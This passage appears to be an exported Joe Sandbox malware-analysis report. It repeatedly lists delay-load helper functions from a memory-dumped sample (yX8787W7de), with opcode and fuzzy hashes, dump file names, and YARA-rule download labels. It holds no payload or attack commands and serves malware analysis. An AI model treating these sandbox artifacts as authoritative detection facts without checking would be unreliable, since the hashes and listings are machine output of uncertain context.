API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f88122d02bd0691dd8e0eba408657d6c7f3f3bed02fc6bca58506b42f8caf3d9
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: f88122d02bd0691dd8e0eba408657d6c7f3f3bed02fc6bca58506b42f8caf3d9
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e8e0fdea59057e2bd3a2b01a48e719052905b688ca133a42fecfc8c2457d3543
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: e8e0fdea59057e2bd3a2b01a48e719052905b688ca133a42fecfc8c2457d3543
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 398203e2bc38edf94184714084495735440a914bbfc8341a46455cbc2dc1b78f
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: 398203e2bc38edf94184714084495735440a914bbfc8341a46455cbc2dc1b78f
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b8cf7145a5a5f55345f3e74309977273b07316566cd6bc55d5c7c8cddc866090
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: b8cf7145a5a5f55345f3e74309977273b07316566cd6bc55d5c7c8cddc866090
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2ad276ee38d3e690d5878159b1f63ca1399a7125a8ca64cea00e93996b57722e
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: 2ad276ee38d3e690d5878159b1f63ca1399a7125a8ca64cea00e93996b57722e
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cfdefb6cd304f8c0b16d6927680b8180a18e8463887f2f901c0de5b4b09ae8bd
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: cfdefb6cd304f8c0b16d6927680b8180a18e8463887f2f901c0de5b4b09ae8bd
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cea57372735f07697e40580edf4dcb2fa38e4f2b16e46b9ff4b8cd37230efc8a
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: cea57372735f07697e40580edf4dcb2fa38e4f2b16e46b9ff4b8cd37230efc8a
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 73f9d528b7b3ea01e8de766b741abd01469ec10eab96760fd965805b26ba1023
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: 73f9d528b7b3ea01e8de766b741abd01469ec10eab96760fd965805b26ba1023
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5691d66d600321f5e0ae13258d095962fd1ccb037ea89d1050b6b78280d29731
Instruction ID: d0122e154b6d1ff51448f727ea33443091f18246b10dd65eeb230a9382be0939
Opcode Fuzzy Hash: 5691d66d600321f5e0ae13258d095962fd1ccb037ea89d1050b6b78280d29731
Instruction Fuzzy Hash: 46A001E66A9342FCB10866926D06C3B029DC4D5B66B3189AEFC26C84C5AA91684918B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 194a16f37e8406e2a1504c8305fdd6628df98c25449f07c5c441173612d3c83e
Instruction ID: 3656880203b1413f4ef12d00a2f5356c51d9f05dc9f84fe177d382bb0655ed65
Opcode Fuzzy Hash: 194a16f37e8406e2a1504c8305fdd6628df98c25449f07c5c441173612d3c83e
Instruction Fuzzy Hash: D9A011E22A8302FCB00822002C02C3B02ACC0C0B2AB30802EF820A80C0AE80080A08B2

Uniqueness

Uniqueness Score: -1.00%

Function 0013E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2a6b65fc4d79ff010be4029ff7f2b9a0635ed97aef94b6b1f096c22da86e4479
Instruction ID: 78d7d68b8105ac404d2f4186e37656d9ec6047273d6a0a9539cb50e241e63037
Opcode Fuzzy Hash: 2a6b65fc4d79ff010be4029ff7f2b9a0635ed97aef94b6b1f096c22da86e4479
Instruction Fuzzy Hash: 3AA011E22AC302FCB00822002C02C3B02ACC0C0B22B30882EF822A80C0AA80080A08B2

Uniqueness

Uniqueness Score: -1.00%

Function 0013E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4ce3a32663498d87e030afd07dd2b6884cebb5ee3215e1b5766a22bc99778b03
Instruction ID: 78d7d68b8105ac404d2f4186e37656d9ec6047273d6a0a9539cb50e241e63037
Opcode Fuzzy Hash: 4ce3a32663498d87e030afd07dd2b6884cebb5ee3215e1b5766a22bc99778b03
Instruction Fuzzy Hash: 3AA011E22AC302FCB00822002C02C3B02ACC0C0B22B30882EF822A80C0AA80080A08B2

Uniqueness

Uniqueness Score: -1.00%

Function 0013E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 318596fa3032532d72fca3ccd860dc8d22d60d44518cc9018a8995512800bcdc
Instruction ID: 78d7d68b8105ac404d2f4186e37656d9ec6047273d6a0a9539cb50e241e63037
Opcode Fuzzy Hash: 318596fa3032532d72fca3ccd860dc8d22d60d44518cc9018a8995512800bcdc
Instruction Fuzzy Hash: 3AA011E22AC302FCB00822002C02C3B02ACC0C0B22B30882EF822A80C0AA80080A08B2

Uniqueness

Uniqueness Score: -1.00%

Function 0013E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 30de9e0221dc6f56b1ccaac1451dce0e3aa1030d716151ebfafc0f263aaa2942
Instruction ID: 78d7d68b8105ac404d2f4186e37656d9ec6047273d6a0a9539cb50e241e63037
Opcode Fuzzy Hash: 30de9e0221dc6f56b1ccaac1451dce0e3aa1030d716151ebfafc0f263aaa2942
Instruction Fuzzy Hash: 3AA011E22AC302FCB00822002C02C3B02ACC0C0B22B30882EF822A80C0AA80080A08B2

Uniqueness

Uniqueness Score: -1.00%

Function 0013E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E3FC

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 85180d449ad61c51e53d3d65fdf94a22bd8382f3b014c353524985b22f5abcb2
Instruction ID: 78d7d68b8105ac404d2f4186e37656d9ec6047273d6a0a9539cb50e241e63037
Opcode Fuzzy Hash: 85180d449ad61c51e53d3d65fdf94a22bd8382f3b014c353524985b22f5abcb2
Instruction Fuzzy Hash: 3AA011E22AC302FCB00822002C02C3B02ACC0C0B22B30882EF822A80C0AA80080A08B2

Uniqueness

Uniqueness Score: -1.00%

Function 0013E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E51F

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 696d4f6fa9f6c3dd8083b7ace61576a614237e097d09063ea4d97b85f52cb4d6
Instruction ID: 3c6dd2fb18e15f268605cc7ab62f18c19e7e922127cb9dae4d6d6f406de0b0af
Opcode Fuzzy Hash: 696d4f6fa9f6c3dd8083b7ace61576a614237e097d09063ea4d97b85f52cb4d6
Instruction Fuzzy Hash: ABA011CAAA8302FCB00822002C02C3B028CC0C2F2AB30882EF822880C0AA800C8808B0

Uniqueness

Uniqueness Score: -1.00%

Function 0013E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E51F

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8645b3ef7f5b4dd7ab72f92c537eb211d2111f38ac00d5aa53cb2c5b3bae0afd
Instruction ID: 3c6dd2fb18e15f268605cc7ab62f18c19e7e922127cb9dae4d6d6f406de0b0af
Opcode Fuzzy Hash: 8645b3ef7f5b4dd7ab72f92c537eb211d2111f38ac00d5aa53cb2c5b3bae0afd
Instruction Fuzzy Hash: ABA011CAAA8302FCB00822002C02C3B028CC0C2F2AB30882EF822880C0AA800C8808B0

Uniqueness

Uniqueness Score: -1.00%

Function 0013E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E51F

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
